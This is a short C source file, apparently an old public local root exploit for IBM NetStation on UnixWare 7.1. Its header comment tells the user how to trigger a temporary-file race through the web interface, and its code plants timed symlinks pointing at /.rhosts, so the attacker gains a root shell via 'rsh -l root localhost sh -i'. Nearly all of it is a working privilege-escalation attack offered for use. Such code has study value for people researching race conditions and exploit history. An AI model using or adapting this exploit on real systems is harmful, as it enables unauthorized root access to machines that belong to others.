/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
 *
 * Exploits a temporary file race condition in NetStation's HTTP interface
 *
 * To exploit: first, change the paths below to reflect your individual
 * settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
 * create it for you.  Next, point your browser at 
 * http://localhost:880 and login as a normal user.  Click on "Hardware"
 * Then "workstation".  This will create <netstationdir>/users/xnec.
 * Next, compile and run this program.  You only have thirty seconds from
 * the time you complete this step to then click on "Workstation".  When
 * this is done, you should have an /.rhosts which you own.  On some 
 * UnixWare systems, you may need to chown root /.rhosts in order to do
 * rsh -l root localhost sh -i.
 *
 * Brock Tellier btellier@usa.net
 *
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main() {

/* Change these paths */

char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;

sec = time(0);

for (i = 0; i < 30; i++) {
  sprintf(sourcesym, "%s%d", source, (sec + i));
  symlink(dest,sourcesym);
}

}